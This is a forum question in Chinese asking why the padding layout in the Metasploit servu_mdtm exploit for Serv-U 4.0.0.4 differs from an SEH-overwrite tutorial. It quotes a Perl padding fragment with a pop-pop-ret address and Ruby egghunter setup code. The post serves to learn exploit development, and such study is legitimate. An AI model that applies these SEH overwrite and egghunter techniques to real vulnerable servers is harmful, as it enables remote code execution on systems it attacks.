windows/ftp/servu_mdtm是关于servu 4.0.0.4的一个exploit,能够攻击成功,最近看了moonife翻译的Exploit编程系列,发现这个是基于seh编写的exploit,但是它的填充和翻译资料上的有些不同,请问谁能解释一下???
在教程中填充的构造是[Junk][next SEH][SEH][Shellcode],如下所示,它的
my $junk = "A" x 584;
my $nextSEHoverwrite = "\xeb\x06\x90\x90"; #breakpoint
my $SEHoverwrite = pack('V',0x1001E812); #pop pop ret from player.dll
my $shellcode = "1ABCDEFGHIJKLM2ABCDEFGHIJKLM3ABCDEFGHIJKLM";
my $junk2 = "\x90" x 1000;
my $payload =$junk. $nextSEHoverwrite.$SEHoverwrite.$junk2
在servu_mdtm中,它的填充比较复杂
search_rtag = "\x34\x33\x32\x31" # +1 / 0 / -1 [start, end, stored]
search_stub = Rex::Arch::X86.searcher(search_rtag)
search_code = "\x83\xc4\xfc\x5f" + search_stub + 'BB'
if (datastore['SEHOffset'] < search_code.length)
print_error("Not enough room for search code, adjust SEHOffset")
return
end